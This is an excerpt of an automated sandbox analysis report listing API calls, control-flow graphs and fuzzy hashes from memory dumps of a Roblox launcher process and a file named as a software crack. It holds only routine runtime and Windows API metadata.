              • Source File: 00000001.00000002.1989337502.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID:
              • String ID: |_j
              • API String ID: 0-3413345523
              • Opcode ID: 2ea5b227ad1b2843ae7900a68bd59de03641203ddfec6d0624273a3bece22013
              • Instruction ID: ba1b07104893c29c7f65643d25fedcbf0dfff4304bf3c8891f3570b772c6b26a
              • Opcode Fuzzy Hash: 2ea5b227ad1b2843ae7900a68bd59de03641203ddfec6d0624273a3bece22013
              • Instruction Fuzzy Hash: 1601D8377122155FDF168F79EC40ADA33A6EBD53607298121FD25CB158EA31D881C791

              Control-flow Graph

              APIs
              • GetLastError.KERNEL32(00B47218,0000000C), ref: 00A05517
              • ExitThread.KERNEL32 ref: 00A0551E
              Memory Dump Source
              • Source File: 00000001.00000002.1989337502.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: ErrorExitLastThread
              • String ID:
              • API String ID: 1611280651-0
              • Opcode ID: 2e9028d6def5c3a72765abca56f2857f784939e4e5d96cf684b97680c196c81c
              • Instruction ID: 85ceacdb8c59b5428d7dbc31fef467feeb4cae1b9a0712499fe23f1e425572a8
              • Opcode Fuzzy Hash: 2e9028d6def5c3a72765abca56f2857f784939e4e5d96cf684b97680c196c81c
              • Instruction Fuzzy Hash: 02F0C274A84604AFDF05EBB0D94AAAF3B75FF85710F100549F0059B2A2CB756D41CF91

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 75 a199dc-a199e5 76 a19a14-a19a15 75->76 77 a199e7-a199fa RtlFreeHeap 75->77 77->76 78 a199fc-a19a13 GetLastError call a041ad call a0424a 77->78 78->76
              APIs
              • RtlFreeHeap.NTDLL(00000000,00000000,?,00A211F5,?,00000000,?,?,00A21496,?,00000007,?,?,00A21A4A,?,?), ref: 00A199F2
              • GetLastError.KERNEL32(?,?,00A211F5,?,00000000,?,?,00A21496,?,00000007,?,?,00A21A4A,?,?), ref: 00A199FD
              Memory Dump Source
              • Source File: 00000001.00000002.1989337502.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: ErrorFreeHeapLast
              • String ID:
              • API String ID: 485612231-0
              • Opcode ID: 31e5b3fbc133c8ee10c7ef70eccd77e3b5d3396747ecfa05bdeb9b2ae56a56b7
              • Instruction ID: fb8b4a324697dc0f9d3f5675f5621251165e471ab24f7bd65eeea48243c7b30c
              • Opcode Fuzzy Hash: 31e5b3fbc133c8ee10c7ef70eccd77e3b5d3396747ecfa05bdeb9b2ae56a56b7
              • Instruction Fuzzy Hash: F6E08C76100258ABDB116FE8BC08BCA3B98EF88795F144120F608960A1CB318892CBD4

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 83 a1a29b-a1a2a6 84 a1a2b4-a1a2ba 83->84 85 a1a2a8-a1a2b2 83->85 87 a1a2d3-a1a2e4 RtlAllocateHeap 84->87 88 a1a2bc-a1a2bd 84->88 85->84 86 a1a2e8-a1a2f3 call a0424a 85->86 94 a1a2f5-a1a2f7 86->94 89 a1a2e6 87->89 90 a1a2bf-a1a2c6 call a1723c 87->90 88->87 89->94 90->86 96 a1a2c8-a1a2d1 call a20a25 90->96 96->86 96->87
              APIs
              • RtlAllocateHeap.NTDLL(00000008,?,?,?,00A19DA1,00000001,00000364,?,00000006,000000FF,?,00A05529,00B47218,0000000C), ref: 00A1A2DC
              Memory Dump Source
              • Source File: 00000001.00000002.1989337502.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: AllocateHeap
              • String ID:
              • API String ID: 1279760036-0
              • Opcode ID: cbd9ae37e759fe6b7e8f83093c93c9bcba01c549001da484acb5c95d500a53d0
              • Instruction ID: a27d0a744a43b8d9e65112d378cef025f6b9009a4d35a49d4bfd38ebf3ef9298
              • Opcode Fuzzy Hash: cbd9ae37e759fe6b7e8f83093c93c9bcba01c549001da484acb5c95d500a53d0
              • Instruction Fuzzy Hash: 19F0E9326462246BDB215B669D01BDB375CEFA5770F148122BC04970A1CB72DCC186E6

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 99 a1a2f8-a1a304 100 a1a336-a1a341 call a0424a 99->100 101 a1a306-a1a308 99->101 109 a1a343-a1a345 100->109 102 a1a321-a1a332 RtlAllocateHeap 101->102 103 a1a30a-a1a30b 101->103 105 a1a334 102->105 106 a1a30d-a1a314 call a1723c 102->106 103->102 105->109 106->100 111 a1a316-a1a31f call a20a25 106->111 111->100 111->102
              APIs
              • RtlAllocateHeap.NTDLL(00000000,00A053D6,00A19E0E,?,00A137ED,00B474D8,00000018,00000003), ref: 00A1A32A
              Memory Dump Source
              • Source File: 00000001.00000002.1989337502.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: AllocateHeap
              • String ID:
              • API String ID: 1279760036-0
              • Opcode ID: 4aa2cc4699f92b0c95fdabe28bf67f74c7848ea9452648183badc3c623f0ff03
              • Instruction ID: 0c27dd24c3157f9acd721d8779196da8dcd474ae44e4d8d64afae9e4d7ba7471
              • Opcode Fuzzy Hash: 4aa2cc4699f92b0c95fdabe28bf67f74c7848ea9452648183badc3c623f0ff03
              • Instruction Fuzzy Hash: A8E0E53D6062215BD6302BAA9D00BDB365CEF613F0F144121BC219B0C1CB20CC8141E7

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 114 a14fc7-a14ff5 call a2b5f9 call a14d1f 118 a14ffa-a14fff call a2b5d6 114->118
              APIs
              Memory Dump Source
              • Source File: 00000001.00000002.1989337502.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: H_prolog3
              • String ID:
              • API String ID: 431132790-0
              • Opcode ID: b922c9579dd5b34488ea0d5898c1d33375b5e33d0c8a12c44c1013db59866f3d
              • Instruction ID: 925cb56afe998688b363f45819e551665b41c3fba622edb0eedd23095eef86ec
              • Opcode Fuzzy Hash: b922c9579dd5b34488ea0d5898c1d33375b5e33d0c8a12c44c1013db59866f3d
              • Instruction Fuzzy Hash: 54E01A72C1020E9BCF00DFE8C542BEFB7B8AF08300F508026A211E7140EB3893858BA1
              APIs
              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 009FB68B
              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 009FB695
              • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,?), ref: 009FB6A2
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1989337502.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: ExceptionFilterUnhandled$DebuggerPresent
              • String ID: |_j
              • API String ID: 3906539128-3413345523
              • Opcode ID: 6a26552a4440e73439500d1a48764ccc76f0a244457c5981afa8606fcd1d49b3
              • Instruction ID: 56634dca275dba299a7efeef2505fac9396344423854847f2d627a54b7ac1493
              • Opcode Fuzzy Hash: 6a26552a4440e73439500d1a48764ccc76f0a244457c5981afa8606fcd1d49b3
              • Instruction Fuzzy Hash: 8631C47590122C9BCB21DF64D88979DBBB8BF48310F5041EAE50CA7261E7749F858F44
              APIs
              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000000), ref: 00A15858
              Memory Dump Source
              • Source File: 00000001.00000002.1989337502.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: ExceptionRaise
              • String ID:
              • API String ID: 3997070919-0
              • Opcode ID: 12cbc5831da4e7d0d4b7b6a4b2b2d4e7c0f6aea56ff0a1b460fdf8e87ee22fb8
              • Instruction ID: 376c1e457c6135805f8637e33fafa7c6a739b141702d0a6fae4abd56ff711aab
              • Opcode Fuzzy Hash: 12cbc5831da4e7d0d4b7b6a4b2b2d4e7c0f6aea56ff0a1b460fdf8e87ee22fb8
              • Instruction Fuzzy Hash: C1B13E35A10A09DFD719CF28C486BA57BE1FF85364F298658E899CF2A1C335E991CF40
              Memory Dump Source
              • Source File: 00000001.00000002.1989337502.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9532f4950ef85930ce68b9e42bf3a45de2579ba7eb0b500e5035a8a677a43d02
              • Instruction ID: 7b389e6266e3955a3958a6be6ba79c1982dfa0084aeb81b21677b10a109823c0
              • Opcode Fuzzy Hash: 9532f4950ef85930ce68b9e42bf3a45de2579ba7eb0b500e5035a8a677a43d02
              • Instruction Fuzzy Hash: 46E08C32A11228EBCB14DBD8DA04DCAF7ECEB44B50B1540A6F501D3100D270DE40DBD0
              Memory Dump Source
              • Source File: 00000001.00000002.1989337502.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: aabcca1a103a74f101aa2a2089a7863622b70a41a57d6717e2ede07f69ceffea
              • Instruction ID: 699a181c78f2c40116d1f4ca9c27778418c5f298531db8fbe01de6eb478367dc
              • Opcode Fuzzy Hash: aabcca1a103a74f101aa2a2089a7863622b70a41a57d6717e2ede07f69ceffea
              • Instruction Fuzzy Hash: B4C08C38080D0056CE298F1886B13E43364B3B9782F80058CC9070BA42C51E9CC3DA00
              APIs
              • _ValidateLocalCookies.LIBCMT ref: 009F8B67
              • ___except_validate_context_record.LIBVCRUNTIME ref: 009F8B6F
              • _ValidateLocalCookies.LIBCMT ref: 009F8BF8
              • __IsNonwritableInCurrentImage.LIBCMT ref: 009F8C23
              • _ValidateLocalCookies.LIBCMT ref: 009F8C78
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1989337502.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
              • String ID: csm$|_j
              • API String ID: 1170836740-694016560
              • Opcode ID: 2c12122cf559e0f459a15a94cbb755a2920fceb8155cd622c3fbfd75b53af4f2
              • Instruction ID: efaa541aab38a7c66667072498aab87d024001c8f2159e70eceae843f27a7984
              • Opcode Fuzzy Hash: 2c12122cf559e0f459a15a94cbb755a2920fceb8155cd622c3fbfd75b53af4f2
              • Instruction Fuzzy Hash: 4041E434A0020DAFCF10DF68C895ABFBBB9EF45314F1480A5EA159B392DB31E951CB91
              APIs
              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,6AE65F7C,?,?,00000000,00A3D7C8,000000FF,?,00A140E1,00000002,?,00A140B5,00A05409), ref: 00A14143
              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00A14155
              • FreeLibrary.KERNEL32(00000000,?,?,00000000,00A3D7C8,000000FF,?,00A140E1,00000002,?,00A140B5,00A05409), ref: 00A14177
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1989337502.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: AddressFreeHandleLibraryModuleProc
              • String ID: CorExitProcess$mscoree.dll$|_j
              • API String ID: 4061214504-3688644886
              • Opcode ID: 32219f64e39d039cae0c6341bf9f8f7821ae3fd05ed12331de6c025d75b9ca61
              • Instruction ID: 9ae7b31cec19d03e35d8eac1b69eac6aef32e6d5a7a8517c8a5557f6bd46480e
              • Opcode Fuzzy Hash: 32219f64e39d039cae0c6341bf9f8f7821ae3fd05ed12331de6c025d75b9ca61
              • Instruction Fuzzy Hash: 5001D679914669FFDB128F94DC05FEEB7F8FB49B11F000625F811A22A0DBB59981CA90
              APIs
              • __freea.LIBCMT ref: 00A1CED5
                • Part of subcall function 00A1A2F8: RtlAllocateHeap.NTDLL(00000000,00A053D6,00A19E0E,?,00A137ED,00B474D8,00000018,00000003), ref: 00A1A32A
              • __freea.LIBCMT ref: 00A1CEEA
              • __freea.LIBCMT ref: 00A1CEFA
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1989337502.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: __freea$AllocateHeap
              • String ID: |_j
              • API String ID: 2243444508-3413345523
              • Opcode ID: fc2f4a3fcc7a5815e3b9e6210019ff72cad9bafa709bd51451544d550873f4ce
              • Instruction ID: 180c1f5e02044f305d9e0c9eb026ab1f5668116b9bb62aa0c75aa94b1dc226ca
              • Opcode Fuzzy Hash: fc2f4a3fcc7a5815e3b9e6210019ff72cad9bafa709bd51451544d550873f4ce
              • Instruction Fuzzy Hash: 7751D372640216AFEF259F64DC81EFF3BA9EF44760B150129FD08EA190E771CC9087A0
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1989337502.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID:
              • String ID: |_j
              • API String ID: 0-3413345523
              • Opcode ID: 4b2051d776d028186eec515e51c9d7bf76cbdefbcf08fd7f86895f80c325d20c
              • Instruction ID: 6bb0c7ca02879a6d5c4c1cdec1da85ce13b0192f58078765d5c1052c442da3f1
              • Opcode Fuzzy Hash: 4b2051d776d028186eec515e51c9d7bf76cbdefbcf08fd7f86895f80c325d20c
              • Instruction Fuzzy Hash: 54A122B3E042459FDF25EFA8D8957EDBBF2AB45720F144029E405AB2A1DB319EC0CB51
              APIs
                • Part of subcall function 00A1FA3E: GetOEMCP.KERNEL32(00000000,?,?,?,?), ref: 00A1FA69
              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,00A1FD55,?,00000000,?,?,?), ref: 00A1FF6F
              • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,00A1FD55,?,00000000,?,?,?), ref: 00A1FFB1
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1989337502.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: CodeInfoPageValid
              • String ID: |_j
              • API String ID: 546120528-3413345523
              • Opcode ID: 491f94f9187c7f9b403b27cf28ce7468da2b71c6d12e5dbd39ac751e7425f33d
              • Instruction ID: 0706db39ccb35fe0e08e9cd6777cde495367d6901221eb14b4448205a724cd9b
              • Opcode Fuzzy Hash: 491f94f9187c7f9b403b27cf28ce7468da2b71c6d12e5dbd39ac751e7425f33d
              • Instruction Fuzzy Hash: AC51E170A042958EEB24CF79D885BFABBF5EF85300F18417ED0868B252D7799986CB50
              APIs
              • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A217FD
              • __freea.LIBCMT ref: 00A2180C
                • Part of subcall function 00A1A2F8: RtlAllocateHeap.NTDLL(00000000,00A053D6,00A19E0E,?,00A137ED,00B474D8,00000018,00000003), ref: 00A1A32A
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1989337502.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: AllocateHeapStringType__freea
              • String ID: |_j
              • API String ID: 4073780324-3413345523
              • Opcode ID: dc74ef1dbc3a81966631df0743c790f6754fbf6ea557636a2a99f5c26c2d4518
              • Instruction ID: b6503fa7d0d6cf41bd0eae94a9076be2e5ca171bd93640790c0a3435313a0a51
              • Opcode Fuzzy Hash: dc74ef1dbc3a81966631df0743c790f6754fbf6ea557636a2a99f5c26c2d4518
              • Instruction Fuzzy Hash: 5F31D071A0026AABCF219F69EC85EEF7BA9EF94710F050538F804A7250E734CD51CB90
              APIs
              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 009E163E
              • ___raise_securityfailure.LIBCMT ref: 009E1726
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1989337502.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: FeaturePresentProcessor___raise_securityfailure
              • String ID: |_j
              • API String ID: 3761405300-3413345523
              • Opcode ID: d5453c66add3ea316207b7eac0d2736ae15052fd74a773625ba6218cbe430d49
              • Instruction ID: 431206fbdaee62d6ca7376755de0eb8b9aea49ea81edcba13922891fc0bfbb23
              • Opcode Fuzzy Hash: d5453c66add3ea316207b7eac0d2736ae15052fd74a773625ba6218cbe430d49
              • Instruction Fuzzy Hash: E821F3F5911209DEE321CF99F956B457BECFB48700F14416AE905CBBA8D3B05A82DF48

              Execution Graph

              Execution Coverage:84.6%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:0%
              Total number of Nodes:5
              Total number of Limit Nodes:1

              Callgraph

              callgraph 0 Function_00401000 1 Function_00401AD8 1->0

              Control-flow Graph

              APIs
              • LoadIconA.USER32(00403000,000001F4), ref: 0040104C
              • LoadCursorA.USER32(00000000,00007F00), ref: 0040105B
              • RegisterClassExA.USER32(00000030), ref: 0040106E
              • CreateWindowExA.USER32(00000000,WinClass32,WinClass32,00CF0000,?,?,?,?,00000000,00000000,00403000,00000000), ref: 004010AA
              • ShowWindow.USER32(00000001,?), ref: 004010BC
              • UpdateWindow.USER32(00000001), ref: 004010C7
              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004010D6
              • TranslateMessage.USER32(?), ref: 004010E4
              • DispatchMessageA.USER32(?), ref: 004010ED
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.1763296134.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_AkrienPremiumCrackByHurminka.jbxd
              Similarity
              • API ID: MessageWindow$Load$ClassCreateCursorDispatchIconRegisterShowTranslateUpdate
              • String ID: 0$WinClass32
              • API String ID: 282685165-2329282442
              • Opcode ID: c6f244753a2bc84237680407939961650baec8381a8dcf39c5ba78c2ad2f1f46
              • Instruction ID: 47d6b7d35728adeecb0fde599aadb8774aba34f0bad3284053c57367e6fa7a97
              • Opcode Fuzzy Hash: c6f244753a2bc84237680407939961650baec8381a8dcf39c5ba78c2ad2f1f46
              • Instruction Fuzzy Hash: 7D210C70D41249AAEF10EFD0CC46BDDBFB8AB04708F20802AF200BA1E5D7B96655DB5C

              Control-flow Graph

              APIs
              • GetCommandLineA.KERNEL32 ref: 00401AD8
              • GetModuleHandleA.KERNEL32(00000000), ref: 00401AE4
              • GetProcessHeap.KERNEL32(00000000), ref: 00401AEE
                • Part of subcall function 00401000: LoadIconA.USER32(00403000,000001F4), ref: 0040104C
                • Part of subcall function 00401000: LoadCursorA.USER32(00000000,00007F00), ref: 0040105B
                • Part of subcall function 00401000: RegisterClassExA.USER32(00000030), ref: 0040106E
                • Part of subcall function 00401000: CreateWindowExA.USER32(00000000,WinClass32,WinClass32,00CF0000,?,?,?,?,00000000,00000000,00403000,00000000), ref: 004010AA
                • Part of subcall function 00401000: ShowWindow.USER32(00000001,?), ref: 004010BC
                • Part of subcall function 00401000: UpdateWindow.USER32(00000001), ref: 004010C7
                • Part of subcall function 00401000: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004010D6
                • Part of subcall function 00401000: TranslateMessage.USER32(?), ref: 004010E4
                • Part of subcall function 00401000: DispatchMessageA.USER32(?), ref: 004010ED
              • ExitProcess.KERNEL32(00000000,00000000,0000000A,00000000), ref: 00401B0F
              Memory Dump Source
              • Source File: 00000002.00000002.1763296134.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000002.00000002.1763234732.0000000000400000.00000002.00000001.01000000.00000008.sdmp
              • Associated: 00000002.00000002.1763329434.0000000000402000.00000002.00000001.01000000.00000008.sdmp
              • Associated: 00000002.00000002.1763357612.0000000000403000.00000004.00000001.01000000.00000008.sdmp
              • Associated: 00000002.00000002.1763357612.0000000000408000.00000004.00000001.01000000.00000008.sdmp
              • Associated: 00000002.00000002.1763357612.0000000000410000.00000004.00000001.01000000.00000008.sdmp
              • Associated: 00000002.00000002.1763517996.0000000000411000.00000008.00000001.01000000.00000008.sdmp
              • Associated: 00000002.00000002.1764513643.0000000000DC2000.00000004.00000001.01000000.00000008.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_AkrienPremiumCrackByHurminka.jbxd
              Similarity
              • API ID: MessageWindow$LoadProcess$ClassCommandCreateCursorDispatchExitHandleHeapIconLineModuleRegisterShowTranslateUpdate
              • String ID:
              • API String ID: 673778540-0
              • Opcode ID: becb866452694a3a7b1e3b16712e2c71598974007851497f18c905e52376158d
              • Instruction ID: 8dce49216dd7d9d4199a49ca56cfbc69a4ccef7545e9a5bd4d655d6bb2b69eda
              • Opcode Fuzzy Hash: becb866452694a3a7b1e3b16712e2c71598974007851497f18c905e52376158d
              • Instruction Fuzzy Hash: 50E06774A45300AAE7217F71AE02B193E75A74174AF00007BB601791F6EBB86A109B5D

              Execution Graph

              Execution Coverage:3.5%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:2.8%
              Total number of Nodes:719
              Total number of Limit Nodes:32

              Control-flow Graph

              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: DebugOutputString
              • String ID: expecting: $, got: $../../../util/win/exception_handler_server.cc$::GetNamedPipeClientProcessId$Check failed: RevertToSelf()$ImpersonateNamedPipeClient$bool __cdecl crashpad::ExceptionHandlerServer::ServiceClientConnection(const class crashpad::internal::PipeServiceContext &)$failed to open $forged client pid, real pid: $forged shutdown request, got: $kernel32.dll$unexpected version. got: $unhandled message type:
              • API String ID: 1166629820-2262201038
              • Opcode ID: 26630c3deb79b383693d5a84ead3f9d8a5b38021d3fbe4c0d1a2e3cfd2bea495
              • Instruction ID: a9cfeddd46ded9b6c5c09630ca71ec980c2de267fc0dd21ec27bf3e005430c25
              • Opcode Fuzzy Hash: 26630c3deb79b383693d5a84ead3f9d8a5b38021d3fbe4c0d1a2e3cfd2bea495
              • Instruction Fuzzy Hash: E1D1B331B40208ABDF10ABA8EC56FEEB7A5FF99700F500165F905BB2D2DB71AD458B50

              Control-flow Graph

              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID:
              • String ID: Failed timeGetDevCaps$Failed timeSetEvent
              • API String ID: 0-3522068268
              • Opcode ID: 797ced6951d89d3783cae9241c16bacfdf152d76c12f876cba9ad4bef44eab37
              • Instruction ID: 6122646d801d28e4506b063d17e2beb652d295a9659fe2a677a13dc972e2f364
              • Opcode Fuzzy Hash: 797ced6951d89d3783cae9241c16bacfdf152d76c12f876cba9ad4bef44eab37
              • Instruction Fuzzy Hash: 60517D75A00A09DFCB14DFA8D845AEAB7B8FF49710F004669F906E7360DB35A941CB91

              Control-flow Graph

              APIs
              • ConnectNamedPipe.KERNEL32(?,00000000), ref: 008B0E55
              • GetLastError.KERNEL32 ref: 008B0E5F
              • GetLastError.KERNEL32(ConnectNamedPipe), ref: 008B0E70
              • DisconnectNamedPipe.KERNEL32(?,00000000,ConnectNamedPipe), ref: 008B0EAC
              • DisconnectNamedPipe.KERNEL32(?), ref: 008B0EC4
              Strings
              • unsigned long __stdcall crashpad::ExceptionHandlerServer::PipeServiceProc(void *), xrefs: 008B0E82
              • ../../../util/win/exception_handler_server.cc, xrefs: 008B0E7D
              • ConnectNamedPipe, xrefs: 008B0E68
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: NamedPipe$DisconnectErrorLast$Connect
              • String ID: ../../../util/win/exception_handler_server.cc$ConnectNamedPipe$unsigned long __stdcall crashpad::ExceptionHandlerServer::PipeServiceProc(void *)
              • API String ID: 3779761632-1802093583
              • Opcode ID: 4ab676225477bed71152e754e3dae6030f143e3a16043f72e77a92412faa4d56
              • Instruction ID: 68d1504f58af6d05f9f00d5f389ca4cc662ae2409866189e7c52ac0e2c5ee9a1
              • Opcode Fuzzy Hash: 4ab676225477bed71152e754e3dae6030f143e3a16043f72e77a92412faa4d56
              • Instruction Fuzzy Hash: F6112B75A007146BDB20AF64ED06B9F7268FF51B04F000464F919E72D2D771F90086A6

              Control-flow Graph

              APIs
              • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,2912923C,?,00A1A692,?,?,?,00000000), ref: 00A1A646
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: FreeLibrary
              • String ID: api-ms-$ext-ms-
              • API String ID: 3664257935-537541572
              • Opcode ID: 208f71ed4d0b719709d8750d150f0a2e3b3a7144b6241ba701a35d32833fa035
              • Instruction ID: ef4435954a3024d8cb022ce834c76369283fce7908d7cdc0cd6769256ebdd45a
              • Opcode Fuzzy Hash: 208f71ed4d0b719709d8750d150f0a2e3b3a7144b6241ba701a35d32833fa035
              • Instruction Fuzzy Hash: 0E213D76E06210ABCB329B64EC40ADB7BADDF51370F180120F815A72D1DB30ED41C6D1

              Control-flow Graph

              APIs
              • std::ios_base::failure::failure.LIBCPMT ref: 00740B6F
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: std::ios_base::failure::failure
              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
              • API String ID: 2264918676-1866435925
              • Opcode ID: 38d4382a7f0d92c5ecdfa011b2c42fd59bfc779e97296395f6797cbb6b198698
              • Instruction ID: 2d968f8bddd46f249b0b3183a656bf462199299485ede6103a5463bacffe0add
              • Opcode Fuzzy Hash: 38d4382a7f0d92c5ecdfa011b2c42fd59bfc779e97296395f6797cbb6b198698
              • Instruction Fuzzy Hash: 25C18276A00205CFCB20CF68C480BA9B7A1EB59334F258399DA659B3E2D7399C45CBD1

              Control-flow Graph

              APIs
              • Concurrency::cancel_current_task.LIBCPMT ref: 007277B7
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: Concurrency::cancel_current_task
              • String ID:
              • API String ID: 118556049-0
              • Opcode ID: fdc051797dca0ee84c07ba9cfb187d5e66341f65009458954697ad8fd01d8bff
              • Instruction ID: 7c795e9f50e8b9145d3d9197ed34659efdc81a42cfe9b3d68d91c588ad85f44b
              • Opcode Fuzzy Hash: fdc051797dca0ee84c07ba9cfb187d5e66341f65009458954697ad8fd01d8bff
              • Instruction Fuzzy Hash: FB413CB25082184AE71CF7B4BA5AA6F73889F60350B044139F90DC7752FF39E964C266

              Control-flow Graph

              APIs
